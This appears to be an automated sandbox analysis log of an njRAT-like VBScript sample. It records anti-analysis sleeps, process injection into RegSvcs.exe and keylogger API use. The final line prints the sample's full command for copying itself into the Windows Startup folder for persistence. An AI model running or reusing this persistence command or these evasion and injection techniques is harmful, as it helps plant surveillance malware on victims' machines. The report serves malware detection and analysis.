Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172	Thread sleep count: 1474 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6172	Thread sleep count: 1531 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5808	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5052	Thread sleep count: 1125 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132	Thread sleep count: 146 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6664	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3032	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 492	Thread sleep count: 5825 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6112	Thread sleep count: 3134 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220	Thread sleep time: -1844674407370954s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1474
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1531
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1421
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 483
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 9586
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5825
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3134

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 16_2_00007FFC08383B70 sldt word ptr [eax]

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\

Source: powershell.exe, 00000010.00000003.347930984.0000021665B8D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.357370872.0000021665B8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000003.353224141.0000021665B8F000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 408000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 11CA008

.NET source code references suspicious native API functions

Source: 22.0.RegSvcs.exe.400000.1.unpack, Program.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.1.unpack, Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.0.RegSvcs.exe.400000.3.unpack, Program.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.3.unpack, Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.0.RegSvcs.exe.400000.2.unpack, Program.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.2.unpack, Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.2.RegSvcs.exe.400000.0.unpack, Program.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.2.RegSvcs.exe.400000.0.unpack, Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.0.RegSvcs.exe.400000.0.unpack, Program.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.0.unpack, Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')
Source: 22.0.RegSvcs.exe.400000.4.unpack, Program.cs	Reference to suspicious API methods: ('capGetDriverDescriptionA', 'capGetDriverDescriptionA@avicap32.dll')
Source: 22.0.RegSvcs.exe.400000.4.unpack, Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll'), ('GetAsyncKeyState', 'GetAsyncKeyState@user32')

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Users\user\Desktop\NJratccccassssG2.00.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ VFM.vbs')
